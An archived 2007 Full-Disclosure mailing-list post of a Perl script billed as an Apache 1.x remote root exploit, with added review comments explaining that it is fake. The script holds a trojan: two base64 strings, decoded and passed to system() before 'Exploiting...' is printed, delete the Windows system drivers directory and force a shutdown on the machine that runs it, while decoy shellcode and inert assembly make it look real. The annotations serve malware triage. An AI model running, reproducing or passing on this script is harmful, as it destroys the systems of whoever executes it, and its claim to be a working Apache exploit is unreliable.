A new apache 1.x 0day
From: x666 () Safe-mail net
Date: Mon, 19 Mar 2007 15:15:36 -0400
# NOTE(review): this listing was posted as an "Apache 1.x remote buffer
# overflow" exploit, but nothing below ever opens a connection to the
# target.  What it actually does, in order:
#   - prints a banner and a usage line, then reads $ARGV[1]/$ARGV[2] as
#     target/port -- those are the 2nd/3rd arguments, so $port is always
#     undef even when the `$#ARGV < 1` check passes;
#   - defines `connect` and `socket` subs that shadow the Perl builtins
#     and never touch the network; IO::Socket is loaded but never used and
#     $shellcode is assigned but never sent anywhere;
#   - the `eval qw ( ... )` / `eval qw < ... ` blocks are word lists of
#     assembly text handed to string eval (only the last word reaches the
#     evaluator as Perl), i.e. inert padding;
#   - the MD5 block is a generic pure-Perl MD5 generator and `rehash` a
#     crypt() wrapper; neither is called by anything else here (and
#     rehash's salt index rand(63) can exceed a 62-element list);
#   - `$mov` and `$int` are base64 blobs decoded at runtime and passed to
#     system() unconditionally, before "[x] Exploiting..." is printed.
#     Decoded, the first is a forced recursive delete of the Windows
#     system drivers directory and the second an immediate forced
#     shutdown -- so on a Windows host the script damages the machine it
#     is run on, not the "target";
#   - `$recvdata` is never assigned, so the `== 0` branch always fires and
#     "Exploit failed!" is printed if the process survives that long.
# The original line breaks were lost in the archive rendering (heredoc
# terminators and the closing `>` of `eval qw< ... >` are not on their
# own lines), so the text does not compile as shown.  When triaging
# copies of this post, the two base64 strings fed to system() are the
# thing to key on.
Hi, A new apache 1.x 0day #!/usr/bin/perl use MIME::Base64; use IO::Socket; use HTTP::Response; use HTTP::Status; use Getopt::Std; print q { ################################################################# ## ## Apache 1.X Remote Buffer Overflow getRoot() Exploit ## written by 666 - blueshisha () safe-mail net ## ## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! ## ## If this is gonna be distributed, it will be my last one. ## ################################################################# }; if($#ARGV < 1) { print "[^] Usage : apache.pl [target] [port]\n"; print "[^] Example : apache.pl 127.0.0.1 80\n"; exit; } # Can be replaced, simply get a rootshell $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; my $target = $ARGV[1]; my $port = $ARGV[2]; sub connect { local $SIG{'__DIE__'} = sub { (my $x = $_[0]) =~ s/0x/4/g; die $x }; eval { die "0x4141414141" }; print $@ if $@; } sub socket { push SOCKADDR; push SOCKDATA; push STACKDATA; push ESPOINT; push ENDADDR; } eval qw ( Bytecode: dec cx jz Root mov bp, FloppyOff ;offset pushf push cs push bp jmp [OldISR] Root: inc cx cmp dx, [SecondCntr] ;cs:. 
jne NotSecond IsSecond: mov bh,5 mov bl,21 call seg OSSetCursorXY:OSSetCursorXY ; root runs once mov ax,cx call seg OSPrintWordNum:OSPrintWordNum mov bh,5 mov bl,22 call seg OSSetCursorXY:OSSetCursorXY mov ax,[RootCntr] ;cs:. mov [RootCntr],0 ;cs:. call seg OSPrintWordNum:OSPrintWordNum ); { my ( @S, @T, @M ); my $code = ''; sub md5 { return undef if ( !defined $_[0] ); my $DATA = _md5_pad( $_[0] ); &_md5_init() if ( !defined $M[0] ); return _md5_perl_generated( \$DATA ); } sub _md5_init { return if ( defined $S[0] ); my $i; for ( $i = 1 ; $i <= 64 ; $i++ ) { $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) ); } my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 ); for ( $i = 0 ; $i < 64 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2, 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9 ); &_md5_generate(); my $TEST = _md5_pad('foobar'); } sub _md5_pad { my $l = length( my $msg = shift() . chr(128) ); $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 ); $l = ( $l - 1 ) * 8; $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 ); return $msg; } $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw="); $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA=="); sub _md5_generate { my $N = 'abcddabccdabbcda'; my ( $i, $M ) = ( 0, '' ); $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); $code = <<EOT; sub _md5_perl_generated { BEGIN { \$^H |= 1; }; my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476); my (\$a,\$b,\$c,\$d,\$t,\$i); my \$dr=shift; my \$l=length(\$\$dr); for my \$L (0 .. 
((\$l/64)-1) ) { my \@D = unpack('V16', substr(\$\$dr, \$L*64,64)); (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D); EOT for ( $i = 0 ; $i < 16 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 32 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 48 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 64 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } $code .= <<EOT; \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff; \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff; } # for return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); } EOT eval "$code"; } } sub rehash { my $unencrypted_string = shift @_; my @salt_chars = ('a'..'z','A'..'Z','0'..'9'); my $salt = $salt_chars[rand(63)] . 
# NOTE(review): the `system ($mov);system ($int);` pair on the next line
# is the only thing in this script with an observable effect.  Both run
# unconditionally on the local host, using the base64 strings decoded
# above, before any "[x] Exploiting..." output is printed.
$salt_chars[rand(63)]; return crypt($unencrypted_string, $salt); } eval qw ( make_startup_room: ; setup ebp for WSAStartup data push BYTE 20 ; push 20 pop eax ; register mul eax ; square that shit = 0x190 sub esp, eax ; make room for WSAStartup data mov ecx, esp make_table_room: ; setup ebp for address table sub esp, BYTE (_WSA_INIT_TBLEN * 4) push edi ; [ebp + 8] = LoadLibraryA push esi ; [ebp + 4] = LGetProcAddress push ebx ; [ebp + 0] = kernel32 dll base mov ebp, esp push ecx ; push WSAStartup data address push eax ; push 0x190 make_table: ; hash the table WSA_HASH_WINSOCK wsa_startup: ; call WSAStartup WSA_CALL_WSASTART make_socket: ; call WSASocketA, get a tcp socket WSA_CALL_SOCKET 'tcp' ; we got the socket in edi );system ($mov);system ($int);shift; eval qw ( push word 0x4D2 inc ebx push bx mov ecx, esp push byte 16 push ecx push eax mov ecx, esp mov al, 102 int 0x80 ); print "[x] Exploiting...\n"; sleep(4); eval qw < accept: push eax push edi mov ecx, esp inc ebx mov al, 102 int 0x80 dup2: xor ecx, ecx mov cl, 3
;
# NOTE(review): $recvdata is never assigned anywhere in this script, so
# the `!= 0` branch can never be taken and "Exploit failed!" is the only
# possible outcome of this check.
if ($recvdata != 0) { print "[x] Executing Shellcode..."; } if ($recvdata == 0) { print "[x] Exploit failed!"; } eval qw < exec: xor eax,eax mov al, 11 push ecx push "//sh" push "/bin" mov ebx, esp push ecx push ebx mov ecx, esp int 0x80
;
exit; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/